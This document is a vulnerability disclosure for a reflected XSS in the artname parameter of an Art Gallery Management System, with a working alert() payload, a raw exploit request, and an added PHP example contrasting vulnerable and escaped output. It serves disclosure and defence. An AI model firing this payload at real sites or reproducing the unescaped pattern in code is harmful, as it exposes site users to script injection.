> [Suggested description]
> A reflected cross-site scripting (XSS) vulnerability in Art Gallery
> Management System Project v1.0 allows attackers to execute arbitrary
> web scripts or HTML via a crafted payload injected into the artname
> parameter under ART TYPE option in the navigation bar.
>
> ------------------------------------------
>
> [Additional Information]
> Steps to Reproduce:
> 1. Navigate to the Products page by clicking on "ART TYPE".
> 4. Now insert the XSS payload into the "artname" parameter in the URL and press ENTER to submit the request. Payload: <img%20src=1%20onerror=alert(document.domain)>
> 5. After pressing ENTER the XSS payload is executed and the alert pops up with the domain name.
>
> ############ Product Page Request ############
>
> GET /Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E HTTP/1.1
> Host: localhost
> Cache-Control: max-age=0
> sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"
> sec-ch-ua-mobile: ?0
> sec-ch-ua-platform: "Windows"
> Upgrade-Insecure-Requests: 1
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
> Sec-Fetch-Site: none
> Sec-Fetch-Mode: navigate
> Sec-Fetch-User: ?1
> Sec-Fetch-Dest: document
> Accept-Encoding: gzip, deflate
> Accept-Language: en-US,en;q=0.9
> Cookie: PHPSESSID=hub8pub9s5c1j18cva9594af3q
> Connection: close
>
> ------------------------------------------
>
> [Vulnerability Type]
> Cross Site Scripting (XSS)
>
> ------------------------------------------
>
> [Vendor of Product]
> https://phpgurukul.com/
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Art Gallery Management System Project - V 1.0
>
> ------------------------------------------
>
> [Affected Component]
> http://localhost/Art-Gallery-MS-PHP/product.php?cid=1&&artname=Sculptures
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Escalation of Privileges]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> Cross-Site Scripting (XSS) is a type of vulnerability that allows an attacker to inject malicious code into a website. This code is executed by the victim's web browser, allowing the attacker to steal sensitive information such as login credentials, or to manipulate the content of the website for malicious purposes.
> XSS attacks can be used to perform a variety of malicious actions including:
> 1. Stealing sensitive information
> 2. Redirecting the victim to another webpage
> 3. Executing arbitrary code
> 4. Manipulating the appearance of the website
>
> ------------------------------------------
>
> [Reference]
> https://phpgurukul.com/art-gallery-management-system-using-php-and-mysql/
> https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip
>
> ------------------------------------------
>
> [Discoverer]
> Rahul Patwari
Use CVE-2023-23161.
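The following is an added illustration, not code from the Art Gallery Management System Project: a hypothetical handler for the `artname` parameter of product.php that reflects it unescaped, beside a hardened version that checks the value against the known art types and escapes it on output. Function names and the category list are assumptions.

```php
<?php
// Added example (not the project's code). Hypothetical handlers for the
// artname parameter of product.php described in the report above.

// Vulnerable pattern: the GET parameter is written into the page verbatim,
// so a value such as <img src=1 onerror=...> is rendered as markup.
function renderHeadingVulnerable(array $get): string
{
    $artname = $get['artname'] ?? '';
    return "<h2>Products in category: $artname</h2>";
}

// Assumed list of valid categories (artname is a category such as "Sculptures").
const KNOWN_ART_TYPES = ['Paintings', 'Sculptures', 'Photography'];

// Hardened pattern: reject anything outside the known categories, then
// escape on output so any remaining input is displayed as text, not HTML.
function renderHeadingSafe(array $get): string
{
    $artname = $get['artname'] ?? '';
    if (!in_array($artname, KNOWN_ART_TYPES, true)) {
        return '<h2>Unknown art type</h2>';
    }
    $safe = htmlspecialchars($artname, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<h2>Products in category: $safe</h2>";
}

// Constructed input: the URL-decoded artname value from the report's request.
$input = ['artname' => '<img src=1 onerror=alert(document.domain)>'];
echo renderHeadingVulnerable($input), "\n"; // markup reaches the browser
echo renderHeadingSafe($input), "\n";       // rejected; no markup emitted
echo renderHeadingSafe(['artname' => 'Sculptures']), "\n"; // normal case
```

Output encoding alone (the `htmlspecialchars` call) is the essential fix; the allowlist check adds defence in depth because the parameter is only ever expected to name a category.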